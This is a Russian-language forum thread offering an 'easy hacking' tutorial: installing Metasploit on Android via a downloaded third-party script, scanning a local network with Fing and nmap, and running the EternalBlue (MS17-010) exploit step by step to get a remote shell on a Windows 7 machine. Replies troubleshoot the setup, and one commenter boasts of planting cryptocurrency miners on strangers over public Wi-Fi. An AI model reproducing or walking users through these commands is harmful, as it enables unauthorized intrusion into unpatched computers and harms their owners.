Загрузка...

Easy computer hacking from eternalblue android

Thread in Kali Linux created by Darkhaese208060 Aug 7, 2018. 21,033 views

  1. Darkhaese208060
    Darkhaese208060 Topic starter Aug 7, 2018 19 Nov 12, 2017
    Статья не совсем про KALI, ну просто не знал куда выложить эту тему, поправьте в комментах.




    Всё что нам для этого понадобится:

    • Прямые руки
    • Телефон на андроиде
    • Fing
    • nmap
    • termux и metasploit или kali nethunter
    1)
    Для начала скачаем termux из google play
    Теперь установим metasploit:

    Для этого введем серию команд:


    Code
    apt update

    apt upgrade

    apt install curl

    curl -LO https://raw.githubusercontent.com/1Tech-X/Metasploit-/master/metasploit.sh

    cd metasploit-framework-4.14.28

    ./msfconsole

    Знаю загрузка довольно долгая но нужно потерпеть.


    После всего у нас должен открыться metasploit

    [IMG]

    После того как вы установили metasploit.

    2)Сканирование сети c Fing
    Теперь посмотрим кто есть в нашей сети:
    Для этого удобно использовать утилиту Fing
    Вот так выглядит моя локальная сеть(у всех по разному):


    [IMG]

    Можно легко увидеть "USER-ПК"(у всех всё по разному) он и будет нашей жертвой.Выбираем и запоминаем ip нашей жертвы,в моём случае это 192.168.1.104 и сканим его на порты.

    3)Сканирование на открытые порты c nmap
    Установим этот чудесный инструмент:

    Code
    apt-get update

    apt-get install nmap

    ip нашей жертвы,в моём случае это 192.168.1.104, сканим его на порты
    Код:
    nmap ip жертвы
    В моём случае это:
    nmap 192.168.1.104
    Есть бесконечное множество настроек nmap но в данный момент подойдёт эта(из за скорости)
    Вот что мы видим:


    [IMG]

    У меня стоит на машине 7 винда и у неё открыт 445 порт,любому более менее шарящему в metasploit человеку сразу понятно что первым делом мы будем юзать эксплоит eternalblue.

    4)Проверка уязвимости
    Дальше пойдут скрины с консоли kali nethunter так что не пугайтесь,все команды идентичны с командами в termux.(Мне так просто реально удобнее)
    Для начала мы протестим на сканере возьмёт ли наш эксплоит нашу жертву
    в metasploit вводите:
    Код:
    use auxiliary/scanner/smb/smb_ms17_010
    Здесь нам нужно указать только ip адрес жертвы
    Код:
    Выглядит это так:
    set RHOSTS ip жертвы
    В моём случае это:
    set RHOSTS 192.168.1.104
    Запускаем **** командой

    run


    [IMG]

    Если мы видим что-то подобное значит хост уязвим к эксплоиту

    5)Теперь завершающая стадия:использование эксплоита

    В том же metasploit пишем

    Code
    use exploit/windows/smb/ms17_010_eternalblue
    Здесь нам нужно указать ip жертвы и процесс
    Ip жертвы:
    Код:
    Выглядит это так:
    set RHOST ip жертвы
    В моём случае это:
    set RHOST 192.168.1.104
    И процесс
    Код:
    set ProcessName explorer.exe


    [IMG]

    И после того как вы закончили данные манипуляции можно запускать эксплоит

    exploit
    Если всё удачно то тогда мы получим полный доступ к командной строке атакуемого компьютера.


    [IMG]

    [IMG]

    [IMG]
     
  2. Nikasss_inactive489732
    У кого нет папки metasploit-framework-4.14.28 нужно написать после 4 действия
    chmod +x metasploit.sh
    ./metasploit.sh
    Ждем...
    И теперь она у вас должна появиться (лично у меня так)
     
  3. vladik2002_inactive
    Любые компы можно взломать? Или тока тот который подключен к моей сети?
     
  4. FluttyParty
    FluttyParty Aug 9, 2018 57 Apr 6, 2017
    Перезалей предпоследние скрины,а так годно,в школе поуагарать с компами можно
     
  5. HideHard
    HideHard Aug 9, 2018 Banned 11 Jul 17, 2017
    Какая версия андроида у тебя?
     
  6. Nikasss_inactive489732
    Xiaomi Redmi Note 5 Android 8.1.0
     
  7. Nikasss_inactive489732
    Так же на канале overbafer1 есть видио по этому



    P.S. Только там нету способа как это сделать без доступа к ПК
     
  8. Nikasss_inactive489732
    Можно все но чтобы передать metasploit жертве нужно нужен или прямой доступ к ПК или быть в одной сети чтобы через nmap перекинуть жертве
     
  9. Nikasss_inactive489732
    Отвечаю на свой вопрос:
    Нужно прописать команду pkg install ruby и всё
     
  10. iRezzi_inactive124976
    iRezzi_inactive124976 Aug 13, 2018 Дизайнер 14 Jun 8, 2017
    Единственный минус на 32 бит не идёт я у себя в городе ходил по фри вифи и через метерпетер скидывал майнеры
     
  11. SMYRF
    SMYRF Aug 14, 2018 0 Sep 26, 2017
  12. Pavlik228hacker
    Pavlik228hacker Dec 4, 2018 Banned 3 Dec 4, 2018
     
  13. Pavlik228hacker
    Pavlik228hacker Dec 4, 2018 Banned 3 Dec 4, 2018
    An error occurred while installing
    nokogiri (1.8.0), and Bundler cannot continue.
    Make sure that `gem install nokogiri -v '1.8.0'
    --source 'https://rubygems.org/'` succeeds before
    bundling. Что делать
     
  14. kurba
    kurba Dec 7, 2018 54 Aug 25, 2017
    посмотри на верх в коментах там все написано
     
  15. LordGeron
    LordGeron Dec 14, 2018 0 Dec 13, 2018
    Какие функции у данного експлоита?? В help всего 4-7 команд
     
  16. Dunya228
    Dunya228 Dec 17, 2018 #CYBERBASTARD 40 Jan 29, 2017
    Хелп, пишет: Could not find tzinfo-1.2.3 in any of the sources
     
  17. Openso
    Openso Dec 21, 2018 TRON drainer - zelenka.guru/threads/5126016/ 152 Oct 18, 2018
    Меняй, там команда не apt а pkg( это не дебиан или убунту)
     
  18. Dunya228
    Dunya228 Dec 21, 2018 #CYBERBASTARD 40 Jan 29, 2017
    рутировать телефон нужно?
     
  19. Openso
    Openso Dec 22, 2018 TRON drainer - zelenka.guru/threads/5126016/ 152 Oct 18, 2018
    Dunya228, я понял, это пример запуска в оболочке нетхантер, тогда нипиши так.
     
  20. Dunya228
    Dunya228 Dec 22, 2018 #CYBERBASTARD 40 Jan 29, 2017
    Ну да как бы, а есть что то другое?
     
Loading...
Top